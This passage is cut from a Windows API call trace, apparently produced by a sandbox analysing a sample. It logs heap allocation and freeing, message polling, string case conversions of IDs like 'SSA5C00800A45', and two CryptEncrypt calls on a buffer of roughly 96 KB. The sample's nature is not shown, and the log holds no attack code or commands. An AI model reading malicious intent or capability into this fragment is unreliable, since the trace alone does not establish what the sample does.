(HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0212.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0212.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0212.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0212.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0212.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0212.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0212.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0212.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0212.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0212.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0212.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0212.430] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0212.430] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0212.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0212.430] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0212.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0212.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab680 [0212.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x3854548 [0212.430] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0212.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0212.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0212.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0212.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0212.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0212.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0212.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0212.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0212.431] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0212.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0212.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0212.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0212.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0212.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0212.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0212.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0212.431] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0212.431] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0212.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0212.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0212.431] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0212.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0212.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0212.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0212.431] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0212.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0212.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0212.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0212.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0212.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0212.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0212.432] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854548 | out: hHeap=0x2af0000) returned 1 [0212.432] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0212.434] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0212.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.434] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.434] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.434] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0212.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0212.435] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0212.435] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.435] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0212.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.435] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0212.435] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0212.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0212.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0212.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0212.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0212.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.435] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0212.435] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0212.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0212.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0212.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0212.435] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab728 | out: hHeap=0x2af0000) returned 1 [0212.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0212.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0212.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0212.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c0048 | out: hHeap=0x2af0000) returned 1 [0212.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0212.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0212.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0212.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0212.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0212.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0212.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.440] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0212.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0212.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0212.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0212.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0212.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0212.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0212.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0212.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0212.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0212.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0212.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0212.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0212.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab6f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0212.441] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x1770b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x17710) returned 1 [0212.441] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.441] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.441] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.442] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.442] CharLowerBuffW (in: lpsz="byte[96016]", cchLength=0xb | out: lpsz="byte[96016]") returned 0xb [0212.442] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.444] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.444] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.444] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.444] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.445] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.445] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.445] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0212.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab710, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0212.445] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37c0048*, pdwDataLen=0x8cef60*=0x1770b, dwBufLen=0x17710 | out: pbData=0x37c0048*, pdwDataLen=0x8cef60*=0x17710) returned 1 [0212.449] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.449] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.449] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.450] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.450] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.450] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.450] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.455] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.455] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.455] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.455] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.455] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.455] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.456] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.456] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.456] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.456] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.456] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.456] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.456] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.456] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.456] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.456] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.456] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, 